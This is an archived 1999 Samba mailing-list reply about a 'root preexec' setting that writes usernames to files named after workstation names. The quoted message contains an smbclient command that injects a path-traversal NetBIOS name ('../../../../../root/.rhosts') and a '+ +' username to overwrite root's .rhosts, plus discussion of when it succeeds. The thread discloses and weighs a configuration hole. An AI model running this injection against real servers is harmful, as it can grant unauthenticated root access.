srv/usrmgr and DC
J.A. Gutierrez
spd at gtc1.cps.unizar.es
Tue Mar 23 20:15:09 GMT 1999
>
> >
> > root preexec = echo %u > /opt/samba/status/%m
> > root postexec = rm -f /opt/samba/status/%m
> >
> > this just puts the logged in username in a file named after the
> > workstation name;
> >
>
> Interesting....
> and what happends if you try the following?
>
> $ smbclient '\\yourserver\foo' -U "+ +" -n "../../../../../root/.rhosts"
>
> Domain=[DEMOGRAPHY] OS=[Unix] Server=[Samba 1.9.19-prealpha]
> connected as guest security=user
> SMBtconX failed. ERRSRV - ERRbadpw (Bad password - name/password pair in a
> Tree Connect or Session Setup are invalid.)
>
> Log:
> cli_net_sam_logon: NT_STATUS_NO_SUCH_USER
> domain_client_validate: unable to validate password for user + + in domain
> WORKGROUP to Domain controller BOSERUP. Error was NT_STATUS_NO_SUCH_USER.
Yes, since you are using "security=user" fails that way...
It could be a problem with guest access and security = share,
I guess.
The "-n" part still could be a problem (but the evil user
needs a vaild user/pass); I noticed that some time ago, when
my log files where "/var/adm/samba/%m" (now they are
"/var/adm/samba/log.%m")
--
finger spd at gtc1.cps.unizar.es for PGP / So be easy and free
.mailcap tip of the day: / when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null / (the pogues)
More information about the samba-ntdom
mailing list